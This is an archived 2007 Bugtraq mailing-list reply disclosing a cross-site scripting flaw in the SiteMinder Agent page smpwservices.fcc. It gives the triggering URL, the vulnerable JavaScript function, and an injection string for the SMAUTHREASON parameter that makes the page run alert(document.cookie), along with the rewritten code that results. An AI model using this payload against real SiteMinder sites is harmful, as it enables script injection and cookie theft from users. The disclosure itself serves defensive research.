lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: 9 Nov 2007 09:32:27 -0000
From: overet@...uritydate.it
To: bugtraq@...urityfocus.com
Subject: Re: Re: SiteMinder Agent: Cross Site Scripting

I don't know the details of vulnerable version but smpwservices.fcc page was accessed directly in the tested version.

Exploit code was triggered like this:

[*] with the URL:

https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=X

I can view this javascript code in the result page:

---
function resetCredFields()
{
    if (X == 0 || X == 4 || X == 5 || X == 28 || X == 30 )
    {
        document.PWChange.PASSWORD.value = '';
    }
    else if (X == 1 || X == 18 || X == 20 || X == 22 || X == 31 || X == 34)
    {
        document.PWChange.NEWPASSWORD.value = '';
        document.PWChange.CONFIRMATION.value = '';
    }
}
---

this function was called by:
<BODY onLoad = 'resetCredFields();'>

[*] Inserting the string "1)alert(document.cookie);}function+drop(){if(0" as SMAUTHREASON value we can modify resetCredFields() in this way:

function resetCredFields()
{
    if (1)alert(document.cookie);}function drop(){if(0 == 0 || 1)alert(document.cookie);}function drop(){if(0 == 4 || 1)alert(document.cookie);}function drop(){if(0 == 5 || 1)alert(document.cookie);}function drop(){if(0 == 28 || 1)alert(document.cookie);}function drop(){if(0 == 30 )
    {
        document.PWChange.PASSWORD.value = '';
    }
    else if (1)alert(document.cookie);}function drop(){if(0 == 1 || 1)alert(document.cookie);}function drop(){if(0 == 18 || 1)alert(document.cookie);}function drop(){if(0 == 20 || 1)alert(document.cookie);}function drop(){if(0 == 22 || 1)alert(document.cookie);}function drop(){if(0 == 31 || 1)alert(document.cookie);}function drop(){if(0 == 34)
    {
        document.PWChange.NEWPASSWORD.value = '';
        document.PWChange.CONFIRMATION.value = '';
    }
}

So, the alert code was executed.

Regards,
Giuseppe Gottardi

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ